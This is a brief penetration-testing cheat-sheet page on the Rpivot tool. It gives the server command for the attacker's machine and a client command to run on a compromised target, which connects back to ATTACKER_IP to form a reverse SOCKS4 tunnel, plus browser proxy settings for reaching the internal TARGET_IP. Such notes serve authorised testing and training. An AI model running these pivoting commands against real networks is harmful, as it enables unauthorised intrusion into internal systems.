githubEdit

Rpivot

Github repo: https://github.com/klsecservices/rpivot.git

SOCKS4 proxy

1) Attacker

python server.py --server-port 9999 --server-ip ATTACKER_IP --proxy-ip 127.0.0.1 --proxy-port 1080 

2) Target

python client.py --server-ip ATTACKER_IP --server-port 9999 

Now go to the web browser, then go to "Connections Settings"

1) Manual proxy configuration

2) On "SOCKS Host", write 127.0.0.1 on port 1080

3) Click the "SOCKS v4" radio button

4) On "No proxy for", write 127.0.0.1

5) Browse to TARGET_IP

Last updated